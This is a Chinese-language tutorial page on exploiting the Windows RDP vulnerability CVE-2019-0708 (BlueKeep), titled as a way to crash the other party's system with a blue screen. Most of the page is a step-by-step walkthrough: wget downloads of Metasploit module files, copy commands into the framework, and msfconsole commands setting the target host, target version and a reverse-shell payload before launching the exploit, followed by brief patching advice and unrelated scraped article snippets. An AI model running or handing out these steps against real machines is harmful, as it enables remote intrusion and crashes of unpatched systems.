vmware 蓝屏_网络安全小百科--利用微软CVE 2019-0708漏洞让对方系统蓝屏死机
漏洞背景:
Windows 系列服务器于 2019 年 5 月 15 号,被爆出高危漏洞,该服务器漏洞利用方式是通过远程桌面端口3389进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的永恒之蓝病毒差不多。
2019年9月7日晚上凌晨 1 点左右,metaspolit 官方更新了漏洞利用程序。
漏洞危害:
CVE-2019-0708 漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过 rdp 协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器被黑客入侵、感染病毒,像WannaCry永恒之蓝一样大规模的感染。
漏洞影响范围:
该漏洞影响范围较广,Windows7 SP1、windows2003、windows2008和08 R2、windows xp 系统都会遭到攻击。
漏洞复现环境准备:
CVE 2019-0708的exploit地址:
https://github.com/rapid7/metasploit-framework/pull/12283?from=timeline&isappinstalled=0
ruby脚本地址:
https://github.com/rapid7/metasploit-framework/pull/12283/files
wget下载:
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
复制到KALl MSF中
rdp.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cve_2019_0708_bluekeep.rb
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
rdp_scanner.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cve_2019_0708_bluekeep_rce.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
开始复现:
攻击命令
使用msfconsole
进入后使用reload_all重新加载模块
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
使用info查看工具相关信息以及设置
set RHOSTS 设置IP
set RPORT 设置RDP端口号
使用set target ID设置受害机机器
使用payload设置攻击载荷
使用exploit开始攻击,等待建立连接
Step1.打开kali,下载4个模块
Step2. 复制到MSF文件中
如果出现无法找到rdp目录,用mkdir创建一个目录,运行文章上的4个复制命令到msf文件夹中。
Step3.运行msfconsole,重新加载模块,use连接模块
输入”msfconsole”启动msf,然后输入” reload_all”重新加载模块
进入msf后,输入search 0708 搜索攻击模块。(小技巧:直接use 编号 就能连接)
连接编号为3的攻击模块cve_2019_0708_bluekeep_rce
命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
当连接攻击模块后查看攻击设置命令: show options
RHOSTS=目标
RPORT=端口
Target: 目标版本对应的id
提示:
Target 1 =Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
Target2= Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
Target3=Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
Target4= Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
设置目标ip:set RHOSTS 192.168.1.192(测试机器ip 目标为:win7)
设置攻击版本: set target 3 (目标机器在vm上测试的)
重要一点:set payload windows/x64/shell_bitcp设置攻击载荷(不设置情况可能攻击失败)
设置好目标ip以及targer运行:exploit 开始攻击
经过测试发现会导致大部分机器蓝屏,因为发布的exp为阉割版,所以大家请谨慎测试。
修复方案
1、最简便的方法就是安装一个安全管家,比如火绒、360之类的
2、把系统的自动更新打开或者到微软官网下载补丁
3、设置防火墙规则,并关闭3389端口
vmware 蓝屏_网络安全小百科--利用微软CVE 2019-0708漏洞让对方系统蓝屏死机相关推荐
- 黑客急于利用微软的零日漏洞
Windows 支持工具中的"Follina"漏洞正在 Microsoft Word 中被积极利用,使恶意黑客可以完全访问受感染的系统. 专家表示,现在是修复这个关键漏洞的时候了, ...
- mbsfn子帧_区分小区内子帧状态的方法、装置以及系统_2008100004878_说明书_专利查询_专利网_钻瓜专利网...
技术领域 本发明涉及通信技术领域,尤其涉及一种区分小区内子帧状态的方法.装置以及系统. 背景技术 第三代组织伙伴计划(3GPP,Third Generation Partnership Project ...
- 全球再迎超级飓风,黑客可利用微软“蠕虫级”高危漏洞暴击全球
戳蓝字"CSDN云计算"关注我们哦! WannaCry 余威未散,一场新的全球性"安全浩劫"接踵而来."WannaCry"勒索病毒爆发刚满两 ...
- android 截屏_图文小编福利:Apowersoft专业截屏王
今天小编给大家带来一款非常强大的屏幕截图软件Apowersoft专业截屏王,英文名叫做Apowersoft Screen Capture Pro,通过这款软件可以帮助用户轻松进行屏幕截图,提供全屏.窗 ...
- 台式电脑如何设置开机密码_网络安全小黑板|如何设置开机密码
2014 年 5 月 18 日,浙江湖州的吴女士发现支付宝上的 3 万多元不翼而飞,立即报警.后经湖州警方侦查,是因为两名 85 后嫌疑男子使用技术手段,远程操控了吴女士的计算机,在其中植入了木马病毒 ...
- 蓝牙小电池图标_丽声小百科 | 乐趣助听器如何连接iPhone手机?
乐趣助听器如何连接 iPhone手机? ㋡ 近日有用户朋友咨询了这个问题 小编特意整理了相关步骤 助听器如何与iPhone配对 5步即可搞定,一起学习起来吧 以下步骤为iPhone7 iOS 12.4 ...
- 联想小新air14笔记本黑屏_联想小新air14锐龙版测评,谈谈它的好和坏
联想小新air14锐龙版本测评 了解数码就找小侠客,我是@机圈小侠客 今天呢,主要和大家测评一下联想小新air14这款笔记本, 总体而言的话,这款笔记本它是一个.对于办公人士或者轻度游戏爱好者来说的话 ...
- editview只输入英文_入门小百科丨如何在电脑/手机输入日语
电脑上常用的日语输入法包括微软IME日语输入法.谷歌日语输入法.百度日语输入法:手机上常用的日语输入法包括谷歌手机日语输入法.Simeji日语输入法.Plus J松茸日语输入法等.壹[各种日语输入法] ...
- 联想小新air14笔记本黑屏_联想小新air14笔记本质量差
4月底在联想天猫旗舰店买的小新air14笔记本电脑,此电脑是为了偶尔在家办公用,使用频率小于每月2次. 买后不到两个月,6/22出现无声音的问题,6/26休息日到官方维修中心,工作人员只能做重装系统处 ...
最新文章
- Codeforces Round #104 (Div. 2) E DP(01背包模型) +组和+除法取模求逆元
- 【问题收录】svn: E155010: 提交失败(Ubuntu14.04环境)
- webpack自动打包功能配置
- 通过DBA_SOURCE定位SQL语句属于哪个存储过程
- 20应用统计考研复试要点(part43)--概率论与数理统计
- J - Milking Time POJ - 3616(dp动态规划)
- 前端学习(2712):重读vue电商网站32之让菜单栏展开与折叠
- tablednd保存 php,TableDnD-JavaScript中文网-JavaScript教程资源分享门户
- nuxt解决首屏加载慢问题_Nuxt.js超过Vue.js:你什么时候应该使用它,为什么
- django中admin的使用
- Java中几种输出当前时间的代码
- creo数控编程怎么样_creo3.0数控编程加工使用实例视频教程入门到精通 车床编程...
- java 鸡尾酒排序_十大经典排序【Java实现,手工作坊式】
- Spring Boot基础学习笔记08
- 谷歌地球二次开发基础平台
- 什么是云备份,如何在教育行业正确使用云备份?
- GameofMir引擎架设传奇服务器【4:架设微端】
- Hadoop 实战之分析专利引用数据集(三)
- Linux中软件管理的yum命令
- 【电子技术】如何抑制共模、差模噪声?
热门文章
- ElasticSearch Pipeline 为新增数据设置更新时间
- 阿里云边缘云ENS再升级 四大场景应用加速产业数字化落地
- 为什么企业需要采用混合云战略?
- 如何利用DTS数据同步功能,快速创建数据同步作业
- 云原生的新思考,为什么容器已经无处不在了
- Node.js 应用故障排查手册 —— 综合性 GC 问题和优化
- Node.js 应用故障排查手册 —— Node.js 性能平台使用指南
- 这款神秘的移动端OCR引擎,如何做到“所见即所得”?
- 【漫画】AI小猪的一生
- Logtail从入门到精通(三):机器分组配置